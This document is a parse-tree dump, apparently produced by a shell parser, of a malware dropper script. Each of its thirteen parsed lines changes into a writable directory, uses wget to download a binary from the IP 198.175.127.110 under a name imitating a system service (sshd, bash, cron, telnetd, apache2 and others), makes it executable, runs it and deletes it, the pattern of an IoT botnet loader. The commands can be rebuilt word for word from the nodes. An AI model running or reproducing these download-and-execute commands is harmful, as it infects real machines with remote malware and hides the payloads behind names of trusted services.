ListNode(lineno=2, pos=(12, 151), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 103), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 103), word='http://198.175.127.110/DaNkntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(103, 104)),
  CommandNode(lineno=2, pos=(105, 122), parts=[
    WordNode(lineno=2, pos=(105, 110), word='chmod'),
    WordNode(lineno=2, pos=(111, 113), word='+x'),
    WordNode(lineno=2, pos=(114, 122), word='DaNkntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(122, 123)),
  CommandNode(lineno=2, pos=(124, 134), parts=[
    WordNode(lineno=2, pos=(124, 134), word='./DaNkntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(134, 135)),
  CommandNode(lineno=2, pos=(136, 151), parts=[
    WordNode(lineno=2, pos=(136, 138), word='rm'),
    WordNode(lineno=2, pos=(139, 142), word='-rf'),
    WordNode(lineno=2, pos=(143, 151), word='DaNkntpd'),
  ]),
])
ListNode(lineno=3, pos=(152, 291), parts=[
  CommandNode(lineno=3, pos=(152, 159), parts=[
    WordNode(lineno=3, pos=(152, 154), word='cd'),
    WordNode(lineno=3, pos=(155, 159), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(160, 162)),
  CommandNode(lineno=3, pos=(163, 174), parts=[
    WordNode(lineno=3, pos=(163, 165), word='cd'),
    WordNode(lineno=3, pos=(166, 174), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(175, 177)),
  CommandNode(lineno=3, pos=(178, 185), parts=[
    WordNode(lineno=3, pos=(178, 180), word='cd'),
    WordNode(lineno=3, pos=(181, 185), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(186, 188)),
  CommandNode(lineno=3, pos=(189, 197), parts=[
    WordNode(lineno=3, pos=(189, 191), word='cd'),
    WordNode(lineno=3, pos=(192, 197), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(198, 200)),
  CommandNode(lineno=3, pos=(201, 205), parts=[
    WordNode(lineno=3, pos=(201, 203), word='cd'),
    WordNode(lineno=3, pos=(204, 205), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(205, 206)),
  CommandNode(lineno=3, pos=(207, 243), parts=[
    WordNode(lineno=3, pos=(207, 211), word='wget'),
    WordNode(lineno=3, pos=(212, 243), word='http://198.175.127.110/DaNksshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(243, 244)),
  CommandNode(lineno=3, pos=(245, 262), parts=[
    WordNode(lineno=3, pos=(245, 250), word='chmod'),
    WordNode(lineno=3, pos=(251, 253), word='+x'),
    WordNode(lineno=3, pos=(254, 262), word='DaNksshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(262, 263)),
  CommandNode(lineno=3, pos=(264, 274), parts=[
    WordNode(lineno=3, pos=(264, 274), word='./DaNksshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(274, 275)),
  CommandNode(lineno=3, pos=(276, 291), parts=[
    WordNode(lineno=3, pos=(276, 278), word='rm'),
    WordNode(lineno=3, pos=(279, 282), word='-rf'),
    WordNode(lineno=3, pos=(283, 291), word='DaNksshd'),
  ]),
])
ListNode(lineno=4, pos=(292, 443), parts=[
  CommandNode(lineno=4, pos=(292, 299), parts=[
    WordNode(lineno=4, pos=(292, 294), word='cd'),
    WordNode(lineno=4, pos=(295, 299), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(300, 302)),
  CommandNode(lineno=4, pos=(303, 314), parts=[
    WordNode(lineno=4, pos=(303, 305), word='cd'),
    WordNode(lineno=4, pos=(306, 314), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(315, 317)),
  CommandNode(lineno=4, pos=(318, 325), parts=[
    WordNode(lineno=4, pos=(318, 320), word='cd'),
    WordNode(lineno=4, pos=(321, 325), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(326, 328)),
  CommandNode(lineno=4, pos=(329, 337), parts=[
    WordNode(lineno=4, pos=(329, 331), word='cd'),
    WordNode(lineno=4, pos=(332, 337), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(338, 340)),
  CommandNode(lineno=4, pos=(341, 345), parts=[
    WordNode(lineno=4, pos=(341, 343), word='cd'),
    WordNode(lineno=4, pos=(344, 345), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(345, 346)),
  CommandNode(lineno=4, pos=(347, 386), parts=[
    WordNode(lineno=4, pos=(347, 351), word='wget'),
    WordNode(lineno=4, pos=(352, 386), word='http://198.175.127.110/DaNkopenssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(386, 387)),
  CommandNode(lineno=4, pos=(388, 408), parts=[
    WordNode(lineno=4, pos=(388, 393), word='chmod'),
    WordNode(lineno=4, pos=(394, 396), word='+x'),
    WordNode(lineno=4, pos=(397, 408), word='DaNkopenssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(408, 409)),
  CommandNode(lineno=4, pos=(410, 423), parts=[
    WordNode(lineno=4, pos=(410, 423), word='./DaNkopenssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(423, 424)),
  CommandNode(lineno=4, pos=(425, 443), parts=[
    WordNode(lineno=4, pos=(425, 427), word='rm'),
    WordNode(lineno=4, pos=(428, 431), word='-rf'),
    WordNode(lineno=4, pos=(432, 443), word='DaNkopenssh'),
  ]),
])
ListNode(lineno=5, pos=(444, 583), parts=[
  CommandNode(lineno=5, pos=(444, 451), parts=[
    WordNode(lineno=5, pos=(444, 446), word='cd'),
    WordNode(lineno=5, pos=(447, 451), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(452, 454)),
  CommandNode(lineno=5, pos=(455, 466), parts=[
    WordNode(lineno=5, pos=(455, 457), word='cd'),
    WordNode(lineno=5, pos=(458, 466), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(467, 469)),
  CommandNode(lineno=5, pos=(470, 477), parts=[
    WordNode(lineno=5, pos=(470, 472), word='cd'),
    WordNode(lineno=5, pos=(473, 477), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(478, 480)),
  CommandNode(lineno=5, pos=(481, 489), parts=[
    WordNode(lineno=5, pos=(481, 483), word='cd'),
    WordNode(lineno=5, pos=(484, 489), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(490, 492)),
  CommandNode(lineno=5, pos=(493, 497), parts=[
    WordNode(lineno=5, pos=(493, 495), word='cd'),
    WordNode(lineno=5, pos=(496, 497), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(497, 498)),
  CommandNode(lineno=5, pos=(499, 535), parts=[
    WordNode(lineno=5, pos=(499, 503), word='wget'),
    WordNode(lineno=5, pos=(504, 535), word='http://198.175.127.110/DaNkbash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(535, 536)),
  CommandNode(lineno=5, pos=(537, 554), parts=[
    WordNode(lineno=5, pos=(537, 542), word='chmod'),
    WordNode(lineno=5, pos=(543, 545), word='+x'),
    WordNode(lineno=5, pos=(546, 554), word='DaNkbash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(554, 555)),
  CommandNode(lineno=5, pos=(556, 566), parts=[
    WordNode(lineno=5, pos=(556, 566), word='./DaNkbash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(566, 567)),
  CommandNode(lineno=5, pos=(568, 583), parts=[
    WordNode(lineno=5, pos=(568, 570), word='rm'),
    WordNode(lineno=5, pos=(571, 574), word='-rf'),
    WordNode(lineno=5, pos=(575, 583), word='DaNkbash'),
  ]),
])
ListNode(lineno=6, pos=(584, 723), parts=[
  CommandNode(lineno=6, pos=(584, 591), parts=[
    WordNode(lineno=6, pos=(584, 586), word='cd'),
    WordNode(lineno=6, pos=(587, 591), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(592, 594)),
  CommandNode(lineno=6, pos=(595, 606), parts=[
    WordNode(lineno=6, pos=(595, 597), word='cd'),
    WordNode(lineno=6, pos=(598, 606), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(607, 609)),
  CommandNode(lineno=6, pos=(610, 617), parts=[
    WordNode(lineno=6, pos=(610, 612), word='cd'),
    WordNode(lineno=6, pos=(613, 617), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(618, 620)),
  CommandNode(lineno=6, pos=(621, 629), parts=[
    WordNode(lineno=6, pos=(621, 623), word='cd'),
    WordNode(lineno=6, pos=(624, 629), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(630, 632)),
  CommandNode(lineno=6, pos=(633, 637), parts=[
    WordNode(lineno=6, pos=(633, 635), word='cd'),
    WordNode(lineno=6, pos=(636, 637), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(637, 638)),
  CommandNode(lineno=6, pos=(639, 675), parts=[
    WordNode(lineno=6, pos=(639, 643), word='wget'),
    WordNode(lineno=6, pos=(644, 675), word='http://198.175.127.110/DaNktftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(675, 676)),
  CommandNode(lineno=6, pos=(677, 694), parts=[
    WordNode(lineno=6, pos=(677, 682), word='chmod'),
    WordNode(lineno=6, pos=(683, 685), word='+x'),
    WordNode(lineno=6, pos=(686, 694), word='DaNktftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(694, 695)),
  CommandNode(lineno=6, pos=(696, 706), parts=[
    WordNode(lineno=6, pos=(696, 706), word='./DaNktftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(706, 707)),
  CommandNode(lineno=6, pos=(708, 723), parts=[
    WordNode(lineno=6, pos=(708, 710), word='rm'),
    WordNode(lineno=6, pos=(711, 714), word='-rf'),
    WordNode(lineno=6, pos=(715, 723), word='DaNktftp'),
  ]),
])
ListNode(lineno=7, pos=(724, 863), parts=[
  CommandNode(lineno=7, pos=(724, 731), parts=[
    WordNode(lineno=7, pos=(724, 726), word='cd'),
    WordNode(lineno=7, pos=(727, 731), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(732, 734)),
  CommandNode(lineno=7, pos=(735, 746), parts=[
    WordNode(lineno=7, pos=(735, 737), word='cd'),
    WordNode(lineno=7, pos=(738, 746), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(747, 749)),
  CommandNode(lineno=7, pos=(750, 757), parts=[
    WordNode(lineno=7, pos=(750, 752), word='cd'),
    WordNode(lineno=7, pos=(753, 757), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(758, 760)),
  CommandNode(lineno=7, pos=(761, 769), parts=[
    WordNode(lineno=7, pos=(761, 763), word='cd'),
    WordNode(lineno=7, pos=(764, 769), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(770, 772)),
  CommandNode(lineno=7, pos=(773, 777), parts=[
    WordNode(lineno=7, pos=(773, 775), word='cd'),
    WordNode(lineno=7, pos=(776, 777), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(777, 778)),
  CommandNode(lineno=7, pos=(779, 815), parts=[
    WordNode(lineno=7, pos=(779, 783), word='wget'),
    WordNode(lineno=7, pos=(784, 815), word='http://198.175.127.110/DaNkwget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(815, 816)),
  CommandNode(lineno=7, pos=(817, 834), parts=[
    WordNode(lineno=7, pos=(817, 822), word='chmod'),
    WordNode(lineno=7, pos=(823, 825), word='+x'),
    WordNode(lineno=7, pos=(826, 834), word='DaNkwget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(834, 835)),
  CommandNode(lineno=7, pos=(836, 846), parts=[
    WordNode(lineno=7, pos=(836, 846), word='./DaNkwget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(846, 847)),
  CommandNode(lineno=7, pos=(848, 863), parts=[
    WordNode(lineno=7, pos=(848, 850), word='rm'),
    WordNode(lineno=7, pos=(851, 854), word='-rf'),
    WordNode(lineno=7, pos=(855, 863), word='DaNkwget'),
  ]),
])
ListNode(lineno=8, pos=(864, 1003), parts=[
  CommandNode(lineno=8, pos=(864, 871), parts=[
    WordNode(lineno=8, pos=(864, 866), word='cd'),
    WordNode(lineno=8, pos=(867, 871), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(872, 874)),
  CommandNode(lineno=8, pos=(875, 886), parts=[
    WordNode(lineno=8, pos=(875, 877), word='cd'),
    WordNode(lineno=8, pos=(878, 886), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(887, 889)),
  CommandNode(lineno=8, pos=(890, 897), parts=[
    WordNode(lineno=8, pos=(890, 892), word='cd'),
    WordNode(lineno=8, pos=(893, 897), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(898, 900)),
  CommandNode(lineno=8, pos=(901, 909), parts=[
    WordNode(lineno=8, pos=(901, 903), word='cd'),
    WordNode(lineno=8, pos=(904, 909), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(910, 912)),
  CommandNode(lineno=8, pos=(913, 917), parts=[
    WordNode(lineno=8, pos=(913, 915), word='cd'),
    WordNode(lineno=8, pos=(916, 917), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(917, 918)),
  CommandNode(lineno=8, pos=(919, 955), parts=[
    WordNode(lineno=8, pos=(919, 923), word='wget'),
    WordNode(lineno=8, pos=(924, 955), word='http://198.175.127.110/DaNkcron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(955, 956)),
  CommandNode(lineno=8, pos=(957, 974), parts=[
    WordNode(lineno=8, pos=(957, 962), word='chmod'),
    WordNode(lineno=8, pos=(963, 965), word='+x'),
    WordNode(lineno=8, pos=(966, 974), word='DaNkcron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(974, 975)),
  CommandNode(lineno=8, pos=(976, 986), parts=[
    WordNode(lineno=8, pos=(976, 986), word='./DaNkcron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(986, 987)),
  CommandNode(lineno=8, pos=(988, 1003), parts=[
    WordNode(lineno=8, pos=(988, 990), word='rm'),
    WordNode(lineno=8, pos=(991, 994), word='-rf'),
    WordNode(lineno=8, pos=(995, 1003), word='DaNkcron'),
  ]),
])
ListNode(lineno=9, pos=(1004, 1139), parts=[
  CommandNode(lineno=9, pos=(1004, 1011), parts=[
    WordNode(lineno=9, pos=(1004, 1006), word='cd'),
    WordNode(lineno=9, pos=(1007, 1011), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1012, 1014)),
  CommandNode(lineno=9, pos=(1015, 1026), parts=[
    WordNode(lineno=9, pos=(1015, 1017), word='cd'),
    WordNode(lineno=9, pos=(1018, 1026), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1027, 1029)),
  CommandNode(lineno=9, pos=(1030, 1037), parts=[
    WordNode(lineno=9, pos=(1030, 1032), word='cd'),
    WordNode(lineno=9, pos=(1033, 1037), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1038, 1040)),
  CommandNode(lineno=9, pos=(1041, 1049), parts=[
    WordNode(lineno=9, pos=(1041, 1043), word='cd'),
    WordNode(lineno=9, pos=(1044, 1049), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1050, 1052)),
  CommandNode(lineno=9, pos=(1053, 1057), parts=[
    WordNode(lineno=9, pos=(1053, 1055), word='cd'),
    WordNode(lineno=9, pos=(1056, 1057), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1057, 1058)),
  CommandNode(lineno=9, pos=(1059, 1094), parts=[
    WordNode(lineno=9, pos=(1059, 1063), word='wget'),
    WordNode(lineno=9, pos=(1064, 1094), word='http://198.175.127.110/DaNkftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1094, 1095)),
  CommandNode(lineno=9, pos=(1096, 1112), parts=[
    WordNode(lineno=9, pos=(1096, 1101), word='chmod'),
    WordNode(lineno=9, pos=(1102, 1104), word='+x'),
    WordNode(lineno=9, pos=(1105, 1112), word='DaNkftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1112, 1113)),
  CommandNode(lineno=9, pos=(1114, 1123), parts=[
    WordNode(lineno=9, pos=(1114, 1123), word='./DaNkftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1123, 1124)),
  CommandNode(lineno=9, pos=(1125, 1139), parts=[
    WordNode(lineno=9, pos=(1125, 1127), word='rm'),
    WordNode(lineno=9, pos=(1128, 1131), word='-rf'),
    WordNode(lineno=9, pos=(1132, 1139), word='DaNkftp'),
  ]),
])
ListNode(lineno=10, pos=(1140, 1279), parts=[
  CommandNode(lineno=10, pos=(1140, 1147), parts=[
    WordNode(lineno=10, pos=(1140, 1142), word='cd'),
    WordNode(lineno=10, pos=(1143, 1147), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1148, 1150)),
  CommandNode(lineno=10, pos=(1151, 1162), parts=[
    WordNode(lineno=10, pos=(1151, 1153), word='cd'),
    WordNode(lineno=10, pos=(1154, 1162), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1163, 1165)),
  CommandNode(lineno=10, pos=(1166, 1173), parts=[
    WordNode(lineno=10, pos=(1166, 1168), word='cd'),
    WordNode(lineno=10, pos=(1169, 1173), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1174, 1176)),
  CommandNode(lineno=10, pos=(1177, 1185), parts=[
    WordNode(lineno=10, pos=(1177, 1179), word='cd'),
    WordNode(lineno=10, pos=(1180, 1185), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1186, 1188)),
  CommandNode(lineno=10, pos=(1189, 1193), parts=[
    WordNode(lineno=10, pos=(1189, 1191), word='cd'),
    WordNode(lineno=10, pos=(1192, 1193), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1193, 1194)),
  CommandNode(lineno=10, pos=(1195, 1231), parts=[
    WordNode(lineno=10, pos=(1195, 1199), word='wget'),
    WordNode(lineno=10, pos=(1200, 1231), word='http://198.175.127.110/DaNkpftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1231, 1232)),
  CommandNode(lineno=10, pos=(1233, 1250), parts=[
    WordNode(lineno=10, pos=(1233, 1238), word='chmod'),
    WordNode(lineno=10, pos=(1239, 1241), word='+x'),
    WordNode(lineno=10, pos=(1242, 1250), word='DaNkpftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1250, 1251)),
  CommandNode(lineno=10, pos=(1252, 1262), parts=[
    WordNode(lineno=10, pos=(1252, 1262), word='./DaNkpftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1262, 1263)),
  CommandNode(lineno=10, pos=(1264, 1279), parts=[
    WordNode(lineno=10, pos=(1264, 1266), word='rm'),
    WordNode(lineno=10, pos=(1267, 1270), word='-rf'),
    WordNode(lineno=10, pos=(1271, 1279), word='DaNkpftp'),
  ]),
])
ListNode(lineno=11, pos=(1280, 1411), parts=[
  CommandNode(lineno=11, pos=(1280, 1287), parts=[
    WordNode(lineno=11, pos=(1280, 1282), word='cd'),
    WordNode(lineno=11, pos=(1283, 1287), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1288, 1290)),
  CommandNode(lineno=11, pos=(1291, 1302), parts=[
    WordNode(lineno=11, pos=(1291, 1293), word='cd'),
    WordNode(lineno=11, pos=(1294, 1302), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1303, 1305)),
  CommandNode(lineno=11, pos=(1306, 1313), parts=[
    WordNode(lineno=11, pos=(1306, 1308), word='cd'),
    WordNode(lineno=11, pos=(1309, 1313), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1314, 1316)),
  CommandNode(lineno=11, pos=(1317, 1325), parts=[
    WordNode(lineno=11, pos=(1317, 1319), word='cd'),
    WordNode(lineno=11, pos=(1320, 1325), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1326, 1328)),
  CommandNode(lineno=11, pos=(1329, 1333), parts=[
    WordNode(lineno=11, pos=(1329, 1331), word='cd'),
    WordNode(lineno=11, pos=(1332, 1333), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1333, 1334)),
  CommandNode(lineno=11, pos=(1335, 1369), parts=[
    WordNode(lineno=11, pos=(1335, 1339), word='wget'),
    WordNode(lineno=11, pos=(1340, 1369), word='http://198.175.127.110/DaNksh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1369, 1370)),
  CommandNode(lineno=11, pos=(1371, 1386), parts=[
    WordNode(lineno=11, pos=(1371, 1376), word='chmod'),
    WordNode(lineno=11, pos=(1377, 1379), word='+x'),
    WordNode(lineno=11, pos=(1380, 1386), word='DaNksh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1386, 1387)),
  CommandNode(lineno=11, pos=(1388, 1396), parts=[
    WordNode(lineno=11, pos=(1388, 1396), word='./DaNksh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1396, 1397)),
  CommandNode(lineno=11, pos=(1398, 1411), parts=[
    WordNode(lineno=11, pos=(1398, 1400), word='rm'),
    WordNode(lineno=11, pos=(1401, 1404), word='-rf'),
    WordNode(lineno=11, pos=(1405, 1411), word='DaNksh'),
  ]),
])
ListNode(lineno=12, pos=(1412, 1551), parts=[
  CommandNode(lineno=12, pos=(1412, 1419), parts=[
    WordNode(lineno=12, pos=(1412, 1414), word='cd'),
    WordNode(lineno=12, pos=(1415, 1419), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1420, 1422)),
  CommandNode(lineno=12, pos=(1423, 1434), parts=[
    WordNode(lineno=12, pos=(1423, 1425), word='cd'),
    WordNode(lineno=12, pos=(1426, 1434), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1435, 1437)),
  CommandNode(lineno=12, pos=(1438, 1445), parts=[
    WordNode(lineno=12, pos=(1438, 1440), word='cd'),
    WordNode(lineno=12, pos=(1441, 1445), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1446, 1448)),
  CommandNode(lineno=12, pos=(1449, 1457), parts=[
    WordNode(lineno=12, pos=(1449, 1451), word='cd'),
    WordNode(lineno=12, pos=(1452, 1457), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1458, 1460)),
  CommandNode(lineno=12, pos=(1461, 1465), parts=[
    WordNode(lineno=12, pos=(1461, 1463), word='cd'),
    WordNode(lineno=12, pos=(1464, 1465), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1465, 1466)),
  CommandNode(lineno=12, pos=(1467, 1503), parts=[
    WordNode(lineno=12, pos=(1467, 1471), word='wget'),
    WordNode(lineno=12, pos=(1472, 1503), word='http://198.175.127.110/DaNkshit'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1503, 1504)),
  CommandNode(lineno=12, pos=(1505, 1522), parts=[
    WordNode(lineno=12, pos=(1505, 1510), word='chmod'),
    WordNode(lineno=12, pos=(1511, 1513), word='+x'),
    WordNode(lineno=12, pos=(1514, 1522), word='DaNkshit'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1522, 1523)),
  CommandNode(lineno=12, pos=(1524, 1534), parts=[
    WordNode(lineno=12, pos=(1524, 1534), word='./DaNkshit'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1534, 1535)),
  CommandNode(lineno=12, pos=(1536, 1551), parts=[
    WordNode(lineno=12, pos=(1536, 1538), word='rm'),
    WordNode(lineno=12, pos=(1539, 1542), word='-rf'),
    WordNode(lineno=12, pos=(1543, 1551), word='DaNkshit'),
  ]),
])
ListNode(lineno=13, pos=(1552, 1703), parts=[
  CommandNode(lineno=13, pos=(1552, 1559), parts=[
    WordNode(lineno=13, pos=(1552, 1554), word='cd'),
    WordNode(lineno=13, pos=(1555, 1559), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1560, 1562)),
  CommandNode(lineno=13, pos=(1563, 1574), parts=[
    WordNode(lineno=13, pos=(1563, 1565), word='cd'),
    WordNode(lineno=13, pos=(1566, 1574), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1575, 1577)),
  CommandNode(lineno=13, pos=(1578, 1585), parts=[
    WordNode(lineno=13, pos=(1578, 1580), word='cd'),
    WordNode(lineno=13, pos=(1581, 1585), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1586, 1588)),
  CommandNode(lineno=13, pos=(1589, 1597), parts=[
    WordNode(lineno=13, pos=(1589, 1591), word='cd'),
    WordNode(lineno=13, pos=(1592, 1597), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1598, 1600)),
  CommandNode(lineno=13, pos=(1601, 1605), parts=[
    WordNode(lineno=13, pos=(1601, 1603), word='cd'),
    WordNode(lineno=13, pos=(1604, 1605), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1605, 1606)),
  CommandNode(lineno=13, pos=(1607, 1646), parts=[
    WordNode(lineno=13, pos=(1607, 1611), word='wget'),
    WordNode(lineno=13, pos=(1612, 1646), word='http://198.175.127.110/DaNkapache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1646, 1647)),
  CommandNode(lineno=13, pos=(1648, 1668), parts=[
    WordNode(lineno=13, pos=(1648, 1653), word='chmod'),
    WordNode(lineno=13, pos=(1654, 1656), word='+x'),
    WordNode(lineno=13, pos=(1657, 1668), word='DaNkapache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1668, 1669)),
  CommandNode(lineno=13, pos=(1670, 1683), parts=[
    WordNode(lineno=13, pos=(1670, 1683), word='./DaNkapache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1683, 1684)),
  CommandNode(lineno=13, pos=(1685, 1703), parts=[
    WordNode(lineno=13, pos=(1685, 1687), word='rm'),
    WordNode(lineno=13, pos=(1688, 1691), word='-rf'),
    WordNode(lineno=13, pos=(1692, 1703), word='DaNkapache2'),
  ]),
])
ListNode(lineno=14, pos=(1704, 1855), parts=[
  CommandNode(lineno=14, pos=(1704, 1711), parts=[
    WordNode(lineno=14, pos=(1704, 1706), word='cd'),
    WordNode(lineno=14, pos=(1707, 1711), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1712, 1714)),
  CommandNode(lineno=14, pos=(1715, 1726), parts=[
    WordNode(lineno=14, pos=(1715, 1717), word='cd'),
    WordNode(lineno=14, pos=(1718, 1726), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1727, 1729)),
  CommandNode(lineno=14, pos=(1730, 1737), parts=[
    WordNode(lineno=14, pos=(1730, 1732), word='cd'),
    WordNode(lineno=14, pos=(1733, 1737), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1738, 1740)),
  CommandNode(lineno=14, pos=(1741, 1749), parts=[
    WordNode(lineno=14, pos=(1741, 1743), word='cd'),
    WordNode(lineno=14, pos=(1744, 1749), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1750, 1752)),
  CommandNode(lineno=14, pos=(1753, 1757), parts=[
    WordNode(lineno=14, pos=(1753, 1755), word='cd'),
    WordNode(lineno=14, pos=(1756, 1757), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1757, 1758)),
  CommandNode(lineno=14, pos=(1759, 1798), parts=[
    WordNode(lineno=14, pos=(1759, 1763), word='wget'),
    WordNode(lineno=14, pos=(1764, 1798), word='http://198.175.127.110/DaNktelnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1798, 1799)),
  CommandNode(lineno=14, pos=(1800, 1820), parts=[
    WordNode(lineno=14, pos=(1800, 1805), word='chmod'),
    WordNode(lineno=14, pos=(1806, 1808), word='+x'),
    WordNode(lineno=14, pos=(1809, 1820), word='DaNktelnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1820, 1821)),
  CommandNode(lineno=14, pos=(1822, 1835), parts=[
    WordNode(lineno=14, pos=(1822, 1835), word='./DaNktelnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1835, 1836)),
  CommandNode(lineno=14, pos=(1837, 1855), parts=[
    WordNode(lineno=14, pos=(1837, 1839), word='rm'),
    WordNode(lineno=14, pos=(1840, 1843), word='-rf'),
    WordNode(lineno=14, pos=(1844, 1855), word='DaNktelnetd'),
  ]),
])
